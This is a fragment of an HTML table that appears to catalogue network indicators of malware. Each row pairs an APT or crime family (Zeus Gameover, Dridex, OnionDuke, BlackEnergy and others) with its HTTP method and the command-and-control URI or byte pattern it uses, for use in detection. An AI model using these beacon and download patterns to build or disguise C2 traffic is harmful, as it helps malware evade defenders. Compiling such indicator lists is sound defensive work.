<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-HEAD"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-HEAD</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-Table"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-Table</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/order.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/order.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Xpaj"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Xpaj</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Xtreme Rat"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Xtreme Rat</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1234567890.functions"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1234567890.functions</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Xtreme Rat"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Xtreme Rat</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1234567890.functions"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1234567890.functions</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus Gameover"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Zeus Gameover</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search.php?page=73a07bcb51f4be71"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search.php?page=73a07bcb51f4be71</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"BitcoinMiner"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">BitcoinMiner</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"suckerrr/2.3.2\"]}"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">{"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Blazebot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blazebot</span></td><td data-sheets-value="[null,2,"IRC"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">IRC</span></td><td data-sheets-value="[null,2,"NICK USA|94576\nUSER vtptdwd 0 0 :USA|94576"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">NICK USA|94576<br />USER vtptdwd 0 0 :USA|94576</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nurjax Adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nurjax Adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/services/rules.txt?dummy=916"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/services/rules.txt?dummy=916</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Tosct"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Tosct</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nocpos"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nocpos</span></td><td data-sheets-value="[null,2,"GET POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET POST</span></td><td data-sheets-value="[null,2,"/check/echo\n/check"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/check/echo<br />/check</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"OnionDuke"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">OnionDuke</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg=\ns/sysinfo_7.php\n/forum/phpBB3/prx_26.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg=<br />s/sysinfo_7.php<br />/forum/phpBB3/prx_26.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Lagulon (Operation Cleaver)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Lagulon (Operation Cleaver)</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/contador/server.php\n/i/server.php\n/includes/server.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/contador/server.php<br />/i/server.php<br />/includes/server.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT?"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT?</span></td><td data-sheets-value="[null,2,"Medusa"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Medusa</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"%s/bbc_mirror/%s/search?id=%s\n/CNN_Mirror/EN/%s/search?id=%s\n|00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|0 0|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">%s/bbc_mirror/%s/search?id=%s<br />/CNN_Mirror/EN/%s/search?id=%s<br />|00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|0 0|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Toopu"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Toopu</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/toopu.png\n/%s:1048%s\n/num3.html\n/web/get_ad3.asp?type=loadall&machinename= <MACHINE_NAME>-6C78A9C3&cr=yes\n/num3_51la.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/toopu.png<br />/%s:1048%s<br />/num3.html<br />/web/get_ad3.asp?type=loadall&machinename= <machine_name>-6C78A9C3&cr=yes<br />/num3_51la.asp</machine_name></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Twerkin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Twerkin</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/classes/functions.php?functionname=online\n/classes/functions.php?functionname=getupdates\n/classes/functions.php?functionname=getcommand"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/classes/functions.php?functionname=online<br />/classes/functions.php?functionname=getupdates<br />/classes/functions.php?functionname=getcommand</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"TzeeBot / TinyZBot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">TzeeBot / TinyZBot</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/checkupdate.asmx"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/checkupdate.asmx</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"XLS URLDownload ToFileA function for Dridex"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">XLS URLDownload ToFileA function for Dridex</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/koh/mui.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/koh/mui.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Quervar / Induc.C / Dorifel"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Quervar / Induc.C / Dorifel</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/js/way.php?00021708&pin=7DF38AD66C78A9C3\n/404/way.php?00038F50&pin=7DF38AD66C78A9C3\n/test/php/way.php?0002E170&pin=7DF38AD66C78A9C3\n/1.php?JXU9WXFG&pin=DEC09603F4CEFD80"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/js/way.php?00021708&pin=7DF38AD66C78A9C3<br />/404/way.php?00038F50&pin=7DF38AD66C78A9C3<br />/test/php/way.php?0002E170&pin=7DF38AD66C78A9C3<br />/1.php?JXU9WXFG&pin=DEC09603F4CEFD80</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Feidowns downloader / Kilim (?) / Cracktools"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Feidowns downloader / Kilim (?) / Cracktools</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"yeniadmin.php?os=WindowsXP \n/yeniadmin.php?os=Windows7&osbit=64&antiv \n/yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI\nhttp://whos.amung.us/pingjs/?k=yenikazi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">yeniadmin.php?os=WindowsXP <br />/yeniadmin.php?os=Windows7&osbit=64&antiv <br />/yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI<br />http://whos.amung.us/pingjs/?k=yenikazi</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"GameVance Adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GameVance Adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/aj/updtah.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/aj/updtah.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"OpenShopper Adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">OpenShopper Adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"//mmsv/Access3.php\n//opendb/mmsv.php\n//mmsv/Access2.php\n/opapp/postmedia1/Update.dat\n/opapp/postmedia1/OKUpdate.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">//mmsv/Access3.php<br />//opendb/mmsv.php<br />//mmsv/Access2.php<br />/opapp/postmedia1/Update.dat<br />/opapp/postmedia1/OKUpdate.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"SoftPulse Adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">SoftPulse Adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"FakeAV"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">FakeAV</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/[...]/load.php?file=uploader\n/[...]/load.php?file=grabbers\n/[\u2026]/load.php?file=1\n/ohwgx3kiTh/document.doc\n/ohwgx3kiTh/load.php?file=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/[...]/load.php?file=uploader<br />/[...]/load.php?file=grabbers<br />/[…]/load.php?file=1<br />/ohwgx3kiTh/document.doc<br />/ohwgx3kiTh/load.php?file=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Wauchos (download by Zbot of Cridex)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Wauchos (download by Zbot of Cridex)</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/ssdc32716372/file.php\n/auto*.it/*/jeve.exe\n//dd*.ru/old.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ssdc32716372/file.php<br />/auto*.it/*/jeve.exe<br />//dd*.ru/old.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Blackenergy DDos Bot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blackenergy DDos Bot</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"id=[bot_id]&bid=[base64_encoded_build_\nid]&dv=[x]&mv=[y]&dpv=[z]\nid=[bot_id_sha1]&bid=[base64_encoded_build_\nid]&nm=[x]&cn=[y]&num=[z]\nThe only major difference is that the id field contain just\nthe hash instead of the actual string"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">id=[bot_id]&bid=[base64_encoded_build_<br />id]&dv=[x]&mv=[y]&dpv=[z]<br />id=[bot_id_sha1]&bid=[base64_encoded_build_<br />id]&nm=[x]&cn=[y]&num=[z]<br />The only major difference is that the id field contain just<br />the hash instead of the actual string</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Alurewo / Alureon pay per click"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Alurewo / Alureon pay per click</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"OSX Wirelurker"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">OSX Wirelurker</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"mac/getversion.php?sn=<SN>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">mac/getversion.php?sn=<sn></sn></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Systweak Adware - Systweak RegClean Pro & Advanced System Protector"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Systweak Adware - Systweak RegClean Pro & Advanced System Protector</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/getipaddress.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/getipaddress.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"MPlug / Multiplug Adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">MPlug / Multiplug Adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?step_id=1&sf=1&installer_id=8605008392702878770 &publisher_id=2356&source_id= 0&\n page_id=0&affiliate_id= 0&country_code=US&locale=EN&browser_id =4&download_id=7\n 371188128136903471 &external_id=0&installer_type= IX_2013&hardware_id= 159796436\n 02580996082&session_id =17077067485576374638&installer _file_name=Doctorow%2C+E\n +L +-+3+books+.rar&filesize =4.5+MB&product_name= TusFiles&product_title=Doctoro\n w %2C+E+L+-+3+ books+.rar&product_download _url=http%3A%2F%2Fk.tusfiles.net %2Fd%\n 2F74la37ldtz2fvxijot2ypuiocogpoue4j7 hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+\n -+3+books+.ra r&product_file_name=Doctorow %2C+E+L+-+3+books+. rar&project_encod\n e_id=2356&ttl= 1422295723363&isRedirected= 1&enc_u_p=1&st=0&IX_Startapp= 1&self_\n redirect=0&st=0&reffer= http%3A%2F%2Ftusfiles.net %2F&for_html_installer=1&layo\n ut_id= 8&project_name=TusFiles&uuid=%252A"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?step_id=1&sf=1&installer_id=8605008392702878770 &publisher_id=2356&source_id= 0&<br /> page_id=0&affiliate_id= 0&country_code=US&locale=EN&browser_id =4&download_id=7<br /> 371188128136903471 &external_id=0&installer_type= IX_2013&hardware_id= 159796436<br /> 02580996082&session_id =17077067485576374638&installer _file_name=Doctorow%2C+E<br /> +L +-+3+books+.rar&filesize =4.5+MB&product_name= TusFiles&product_title=Doctoro<br /> w %2C+E+L+-+3+ books+.rar&product_download _url=http%3A%2F%2Fk.tusfiles.net %2Fd%<br /> 2F74la37ldtz2fvxijot2ypuiocogpoue4j7 hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+<br /> -+3+books+.ra r&product_file_name=Doctorow %2C+E+L+-+3+books+. rar&project_encod<br /> e_id=2356&ttl= 1422295723363&isRedirected= 1&enc_u_p=1&st=0&IX_Startapp= 1&self_<br /> redirect=0&st=0&reffer= http%3A%2F%2Ftusfiles.net %2F&for_html_installer=1&layo<br /> ut_id= 8&project_name=TusFiles&uuid=%252A</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nemucod JS"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nemucod JS</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=212939\n 1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=212939<br /> 1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Andromeda / Wauchos"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Andromeda / Wauchos</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/and/gate.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/and/gate.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Poweliks click-fraud"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Poweliks click-fraud</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Poweliks click-fraud"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Poweliks click-fraud</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Yoddos / Darkshell / YoYoDDoS"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Yoddos / Darkshell / YoYoDDoS</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u... ........"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u... ........</span></td></tr>
